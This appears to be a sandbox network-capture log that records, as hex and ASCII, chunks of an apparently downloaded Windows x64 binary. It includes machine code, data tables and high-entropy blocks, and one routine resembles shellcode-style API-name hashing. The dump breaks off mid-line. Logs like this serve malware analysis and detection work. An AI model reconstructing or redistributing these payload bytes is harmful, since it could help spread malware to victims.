2023-03-17 08:10:06 UTC	8	IN	Data Raw: 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3 Data Ascii: DBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHD
2023-03-17 08:10:06 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	16	IN	Data Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
2023-03-17 08:10:06 UTC	24	IN	Data Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00 Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
2023-03-17 08:10:06 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	32	IN	Data Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
2023-03-17 08:10:06 UTC	40	IN	Data Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
2023-03-17 08:10:06 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	48	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x\|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
2023-03-17 08:10:06 UTC	56	IN	Data Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2 Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
2023-03-17 08:10:06 UTC	64	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	64	IN	Data Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28 Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
2023-03-17 08:10:06 UTC	72	IN	Data Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15 Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
2023-03-17 08:10:06 UTC	80	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	80	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff Data Ascii: 4000HD$ tX$$$HD$ a\|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
2023-03-17 08:10:06 UTC	88	IN	Data Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 Data Ascii: @> ?-DT!?AsAA
2023-03-17 08:10:06 UTC	96	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	96	IN	Data Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0 Data Ascii: 40000~@P`pX~x~
2023-03-17 08:10:06 UTC	104	IN	Data Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c Data Ascii: hVxWXY<v
2023-03-17 08:10:06 UTC	112	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	112	IN	Data Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15 Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
2023-03-17 08:10:06 UTC	120	IN	Data Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11 Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
2023-03-17 08:10:06 UTC	128	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	128	IN	Data Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8 Data Ascii: 4000f@\|h@@T@zB0\|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
2023-03-17 08:10:06 UTC	136	IN	Data Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
2023-03-17 08:10:06 UTC	144	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	144	IN	Data Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30 Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}\|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
2023-03-17 08:10:06 UTC	152	IN	Data Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
2023-03-17 08:10:06 UTC	160	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	160	IN	Data Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93 Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L\|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
2023-03-17 08:10:06 UTC	168	IN	Data Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 